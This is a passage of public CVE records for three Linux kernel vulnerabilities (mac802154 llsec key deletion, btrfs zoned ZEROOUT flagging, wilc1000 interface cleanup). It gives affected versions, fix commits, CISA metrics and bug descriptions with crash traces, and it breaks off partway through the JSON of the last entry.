Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < 640297c3e897bd7e1481466a6a5cb9560f1edb88 (git)
Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < 49c8951680d7b76fceaee89dcfbab1363fb24fd1 (git)
Affected: 5d637d5aabd85132bd85779677d8acb708e0ed90 , < e8a1e58345cf40b7b272e08ac7b32328b2543e40 (git)

Linux

Affected: 3.16
Unaffected: 0 , < 3.16 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26961",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T17:51:17.536237Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:15.130Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.779Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/068ab2759bc0b4daf0b964de61b2731449c86531"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d3d858650933d44ac12c1f31337e7110c2071821"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dcd51ab42b7a0431575689c5f74b8b6efd45fc2f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/20d3e1c8a1847497269f04d874b2a5818ec29e2d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/640297c3e897bd7e1481466a6a5cb9560f1edb88"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/49c8951680d7b76fceaee89dcfbab1363fb24fd1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e8a1e58345cf40b7b272e08ac7b32328b2543e40"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/cfg802154.h",
            "net/mac802154/llsec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "068ab2759bc0b4daf0b964de61b2731449c86531",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "d3d858650933d44ac12c1f31337e7110c2071821",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "dcd51ab42b7a0431575689c5f74b8b6efd45fc2f",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "20d3e1c8a1847497269f04d874b2a5818ec29e2d",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "640297c3e897bd7e1481466a6a5cb9560f1edb88",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "49c8951680d7b76fceaee89dcfbab1363fb24fd1",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            },
            {
              "lessThan": "e8a1e58345cf40b7b272e08ac7b32328b2543e40",
              "status": "affected",
              "version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/cfg802154.h",
            "net/mac802154/llsec.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.16"
            },
            {
              "lessThan": "3.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmac802154: fix llsec key resources release in mac802154_llsec_key_del\n\nmac802154_llsec_key_del() can free resources of a key directly without\nfollowing the RCU rules for waiting before the end of a grace period. This\nmay lead to use-after-free in case llsec_lookup_key() is traversing the\nlist of keys in parallel with a key deletion:\n\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 4 PID: 16000 at lib/refcount.c:25 refcount_warn_saturate+0x162/0x2a0\nModules linked in:\nCPU: 4 PID: 16000 Comm: wpan-ping Not tainted 6.7.0 #19\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x162/0x2a0\nCall Trace:\n \u003cTASK\u003e\n llsec_lookup_key.isra.0+0x890/0x9e0\n mac802154_llsec_encrypt+0x30c/0x9c0\n ieee802154_subif_start_xmit+0x24/0x1e0\n dev_hard_start_xmit+0x13e/0x690\n sch_direct_xmit+0x2ae/0xbc0\n __dev_queue_xmit+0x11dd/0x3c20\n dgram_sendmsg+0x90b/0xd60\n __sys_sendto+0x466/0x4c0\n __x64_sys_sendto+0xe0/0x1c0\n do_syscall_64+0x45/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nAlso, ieee802154_llsec_key_entry structures are not freed by\nmac802154_llsec_key_del():\n\nunreferenced object 0xffff8880613b6980 (size 64):\n  comm \"iwpan\", pid 2176, jiffies 4294761134 (age 60.475s)\n  hex dump (first 32 bytes):\n    78 0d 8f 18 80 88 ff ff 22 01 00 00 00 00 ad de  x.......\".......\n    00 00 00 00 00 00 00 00 03 00 cd ab 00 00 00 00  ................\n  backtrace:\n    [\u003cffffffff81dcfa62\u003e] __kmem_cache_alloc_node+0x1e2/0x2d0\n    [\u003cffffffff81c43865\u003e] kmalloc_trace+0x25/0xc0\n    [\u003cffffffff88968b09\u003e] mac802154_llsec_key_add+0xac9/0xcf0\n    [\u003cffffffff8896e41a\u003e] ieee802154_add_llsec_key+0x5a/0x80\n    [\u003cffffffff8892adc6\u003e] nl802154_add_llsec_key+0x426/0x5b0\n    [\u003cffffffff86ff293e\u003e] genl_family_rcv_msg_doit+0x1fe/0x2f0\n    [\u003cffffffff86ff46d1\u003e] genl_rcv_msg+0x531/0x7d0\n    [\u003cffffffff86fee7a9\u003e] netlink_rcv_skb+0x169/0x440\n    [\u003cffffffff86ff1d88\u003e] genl_rcv+0x28/0x40\n    [\u003cffffffff86fec15c\u003e] netlink_unicast+0x53c/0x820\n    [\u003cffffffff86fecd8b\u003e] netlink_sendmsg+0x93b/0xe60\n    [\u003cffffffff86b91b35\u003e] ____sys_sendmsg+0xac5/0xca0\n    [\u003cffffffff86b9c3dd\u003e] ___sys_sendmsg+0x11d/0x1c0\n    [\u003cffffffff86b9c65a\u003e] __sys_sendmsg+0xfa/0x1d0\n    [\u003cffffffff88eadbf5\u003e] do_syscall_64+0x45/0xf0\n    [\u003cffffffff890000ea\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nHandle the proper resource release in the RCU callback function\nmac802154_llsec_key_del_rcu().\n\nNote that if llsec_lookup_key() finds a key, it gets a refcount via\nllsec_key_get() and locally copies key id from key_entry (which is a\nlist element). So it\u0027s safe to call llsec_key_put() and free the list\nentry after the RCU grace period elapses.\n\nFound by Linux Verification Center (linuxtesting.org)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:52.446Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/068ab2759bc0b4daf0b964de61b2731449c86531"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3d858650933d44ac12c1f31337e7110c2071821"
        },
        {
          "url": "https://git.kernel.org/stable/c/dcd51ab42b7a0431575689c5f74b8b6efd45fc2f"
        },
        {
          "url": "https://git.kernel.org/stable/c/20d3e1c8a1847497269f04d874b2a5818ec29e2d"
        },
        {
          "url": "https://git.kernel.org/stable/c/640297c3e897bd7e1481466a6a5cb9560f1edb88"
        },
        {
          "url": "https://git.kernel.org/stable/c/49c8951680d7b76fceaee89dcfbab1363fb24fd1"
        },
        {
          "url": "https://git.kernel.org/stable/c/e8a1e58345cf40b7b272e08ac7b32328b2543e40"
        }
      ],
      "title": "mac802154: fix llsec key resources release in mac802154_llsec_key_del",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26961",
    "datePublished": "2024-05-01T05:19:16.361Z",
    "dateReserved": "2024-02-19T14:20:24.201Z",
    "dateUpdated": "2025-05-04T09:00:52.446Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36027 (GCVE-0-2024-36027)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:10 – Updated: 2025-05-04 09:10

Title

btrfs: zoned: do not flag ZEROOUT on non-dirty extent buffer

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: do not flag ZEROOUT on non-dirty extent buffer Btrfs clears the content of an extent buffer marked as EXTENT_BUFFER_ZONED_ZEROOUT before the bio submission. This mechanism is introduced to prevent a write hole of an extent buffer, which is once allocated, marked dirty, but turns out unnecessary and cleaned up within one transaction operation. Currently, btrfs_clear_buffer_dirty() marks the extent buffer as EXTENT_BUFFER_ZONED_ZEROOUT, and skips the entry function. If this call happens while the buffer is under IO (with the WRITEBACK flag set, without the DIRTY flag), we can add the ZEROOUT flag and clear the buffer's content just before a bio submission. As a result: 1) it can lead to adding faulty delayed reference item which leads to a FS corrupted (EUCLEAN) error, and 2) it writes out cleared tree node on disk The former issue is previously discussed in [1]. The corruption happens when it runs a delayed reference update. So, on-disk data is safe. [1] https://lore.kernel.org/linux-btrfs/3f4f2a0ff1a6c818050434288925bdcf3cd719e5.1709124777.git.naohiro.aota@wdc.com/ The latter one can reach on-disk data. But, as that node is already processed by btrfs_clear_buffer_dirty(), that will be invalidated in the next transaction commit anyway. So, the chance of hitting the corruption is relatively small. Anyway, we should skip flagging ZEROOUT on a non-DIRTY extent buffer, to keep the content under IO intact.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f4b994fccbb6f294c…
	https://git.kernel.org/stable/c/68879386180c0efd5…

Impacted products

Vendor

Product

Version

Linux

Affected: aa6313e6ff2bfbf736a2739047bba355d8241584 , < f4b994fccbb6f294c4b31a6ca0114b09f7245043 (git)
Affected: aa6313e6ff2bfbf736a2739047bba355d8241584 , < 68879386180c0efd5a11e800b0525a01068c9457 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36027",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:34:25.215751Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:34:35.864Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.531Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f4b994fccbb6f294c4b31a6ca0114b09f7245043"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/68879386180c0efd5a11e800b0525a01068c9457"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent_io.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f4b994fccbb6f294c4b31a6ca0114b09f7245043",
              "status": "affected",
              "version": "aa6313e6ff2bfbf736a2739047bba355d8241584",
              "versionType": "git"
            },
            {
              "lessThan": "68879386180c0efd5a11e800b0525a01068c9457",
              "status": "affected",
              "version": "aa6313e6ff2bfbf736a2739047bba355d8241584",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/extent_io.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: do not flag ZEROOUT on non-dirty extent buffer\n\nBtrfs clears the content of an extent buffer marked as\nEXTENT_BUFFER_ZONED_ZEROOUT before the bio submission. This mechanism is\nintroduced to prevent a write hole of an extent buffer, which is once\nallocated, marked dirty, but turns out unnecessary and cleaned up within\none transaction operation.\n\nCurrently, btrfs_clear_buffer_dirty() marks the extent buffer as\nEXTENT_BUFFER_ZONED_ZEROOUT, and skips the entry function. If this call\nhappens while the buffer is under IO (with the WRITEBACK flag set,\nwithout the DIRTY flag), we can add the ZEROOUT flag and clear the\nbuffer\u0027s content just before a bio submission. As a result:\n\n1) it can lead to adding faulty delayed reference item which leads to a\n   FS corrupted (EUCLEAN) error, and\n\n2) it writes out cleared tree node on disk\n\nThe former issue is previously discussed in [1]. The corruption happens\nwhen it runs a delayed reference update. So, on-disk data is safe.\n\n[1] https://lore.kernel.org/linux-btrfs/3f4f2a0ff1a6c818050434288925bdcf3cd719e5.1709124777.git.naohiro.aota@wdc.com/\n\nThe latter one can reach on-disk data. But, as that node is already\nprocessed by btrfs_clear_buffer_dirty(), that will be invalidated in the\nnext transaction commit anyway. So, the chance of hitting the corruption\nis relatively small.\n\nAnyway, we should skip flagging ZEROOUT on a non-DIRTY extent buffer, to\nkeep the content under IO intact."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:51.723Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f4b994fccbb6f294c4b31a6ca0114b09f7245043"
        },
        {
          "url": "https://git.kernel.org/stable/c/68879386180c0efd5a11e800b0525a01068c9457"
        }
      ],
      "title": "btrfs: zoned: do not flag ZEROOUT on non-dirty extent buffer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36027",
    "datePublished": "2024-05-30T15:10:17.129Z",
    "dateReserved": "2024-05-17T13:50:33.159Z",
    "dateUpdated": "2025-05-04T09:10:51.723Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26895 (GCVE-0-2024-26895)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:59

Title

wifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: wilc1000: prevent use-after-free on vif when cleaning up all interfaces wilc_netdev_cleanup currently triggers a KASAN warning, which can be observed on interface registration error path, or simply by removing the module/unbinding device from driver: echo spi0.1 > /sys/bus/spi/drivers/wilc1000_spi/unbind ================================================================== BUG: KASAN: slab-use-after-free in wilc_netdev_cleanup+0x508/0x5cc Read of size 4 at addr c54d1ce8 by task sh/86 CPU: 0 PID: 86 Comm: sh Not tainted 6.8.0-rc1+ #117 Hardware name: Atmel SAMA5 unwind_backtrace from show_stack+0x18/0x1c show_stack from dump_stack_lvl+0x34/0x58 dump_stack_lvl from print_report+0x154/0x500 print_report from kasan_report+0xac/0xd8 kasan_report from wilc_netdev_cleanup+0x508/0x5cc wilc_netdev_cleanup from wilc_bus_remove+0xc8/0xec wilc_bus_remove from spi_remove+0x8c/0xac spi_remove from device_release_driver_internal+0x434/0x5f8 device_release_driver_internal from unbind_store+0xbc/0x108 unbind_store from kernfs_fop_write_iter+0x398/0x584 kernfs_fop_write_iter from vfs_write+0x728/0xf88 vfs_write from ksys_write+0x110/0x1e4 ksys_write from ret_fast_syscall+0x0/0x1c [...] Allocated by task 1: kasan_save_track+0x30/0x5c __kasan_kmalloc+0x8c/0x94 __kmalloc_node+0x1cc/0x3e4 kvmalloc_node+0x48/0x180 alloc_netdev_mqs+0x68/0x11dc alloc_etherdev_mqs+0x28/0x34 wilc_netdev_ifc_init+0x34/0x8ec wilc_cfg80211_init+0x690/0x910 wilc_bus_probe+0xe0/0x4a0 spi_probe+0x158/0x1b0 really_probe+0x270/0xdf4 __driver_probe_device+0x1dc/0x580 driver_probe_device+0x60/0x140 __driver_attach+0x228/0x5d4 bus_for_each_dev+0x13c/0x1a8 bus_add_driver+0x2a0/0x608 driver_register+0x24c/0x578 do_one_initcall+0x180/0x310 kernel_init_freeable+0x424/0x484 kernel_init+0x20/0x148 ret_from_fork+0x14/0x28 Freed by task 86: kasan_save_track+0x30/0x5c kasan_save_free_info+0x38/0x58 __kasan_slab_free+0xe4/0x140 kfree+0xb0/0x238 device_release+0xc0/0x2a8 kobject_put+0x1d4/0x46c netdev_run_todo+0x8fc/0x11d0 wilc_netdev_cleanup+0x1e4/0x5cc wilc_bus_remove+0xc8/0xec spi_remove+0x8c/0xac device_release_driver_internal+0x434/0x5f8 unbind_store+0xbc/0x108 kernfs_fop_write_iter+0x398/0x584 vfs_write+0x728/0xf88 ksys_write+0x110/0x1e4 ret_fast_syscall+0x0/0x1c [...] David Mosberger-Tan initial investigation [1] showed that this use-after-free is due to netdevice unregistration during vif list traversal. When unregistering a net device, since the needs_free_netdev has been set to true during registration, the netdevice object is also freed, and as a consequence, the corresponding vif object too, since it is attached to it as private netdevice data. The next occurrence of the loop then tries to access freed vif pointer to the list to move forward in the list. Fix this use-after-free thanks to two mechanisms: - navigate in the list with list_for_each_entry_safe, which allows to safely modify the list as we go through each element. For each element, remove it from the list with list_del_rcu - make sure to wait for RCU grace period end after each vif removal to make sure it is safe to free the corresponding vif too (through unregister_netdev) Since we are in a RCU "modifier" path (not a "reader" path), and because such path is expected not to be concurrent to any other modifier (we are using the vif_mutex lock), we do not need to use RCU list API, that's why we can benefit from list_for_each_entry_safe. [1] https://lore.kernel.org/linux-wireless/ab077dbe58b1ea5de0a3b2ca21f275a07af967d2.camel@egauge.net/

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5956f4203b6cdd075…
	https://git.kernel.org/stable/c/fe20e3d56bc911408…
	https://git.kernel.org/stable/c/a9545af2a533739ff…
	https://git.kernel.org/stable/c/3da9d32b7f4a1a9f7…
	https://git.kernel.org/stable/c/24228dcf1d30c2231…
	https://git.kernel.org/stable/c/73a2aa0aef86c2c07…
	https://git.kernel.org/stable/c/cb5942b77c05d5431…

Impacted products

Vendor

Product

Version

Linux

Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < 5956f4203b6cdd0755bbdd21b45f3933c7026208 (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < fe20e3d56bc911408fc3c27a17c59e9d7885f7d1 (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < a9545af2a533739ffb64d6c9a6fec6f13e2b505f (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < 3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447 (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < 24228dcf1d30c2231caa332be7d3090ac59fbfe9 (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < 73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb (git)
Affected: 8399918f3056e1033f0f4c08eab437fb38d6f22d , < cb5942b77c05d54310a0420cac12935e9b6aa21c (git)

Linux

Affected: 5.5
Unaffected: 0 , < 5.5 (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.707Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5956f4203b6cdd0755bbdd21b45f3933c7026208"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fe20e3d56bc911408fc3c27a17c59e9d7885f7d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9545af2a533739ffb64d6c9a6fec6f13e2b505f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/24228dcf1d30c2231caa332be7d3090ac59fbfe9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb5942b77c05d54310a0420cac12935e9b6aa21c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26895",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:48:12.761255Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:23.894Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/microchip/wilc1000/netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5956f4203b6cdd0755bbdd21b45f3933c7026208",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "fe20e3d56bc911408fc3c27a17c59e9d7885f7d1",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "a9545af2a533739ffb64d6c9a6fec6f13e2b505f",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "3da9d32b7f4a1a9f7e4bb15bb82f2b2dd6719447",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "24228dcf1d30c2231caa332be7d3090ac59fbfe9",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "73a2aa0aef86c2c07be5a2f42c9e6047e1a2f7bb",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            },
            {
              "lessThan": "cb5942b77c05d54310a0420cac12935e9b6aa21c",
              "status": "affected",
              "version": "8399918f3056e1033f0f4c08eab437fb38d6f22d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireless/microchip/wilc1000/netdev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.5"
            },
            {
              "lessThan": "5.5",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
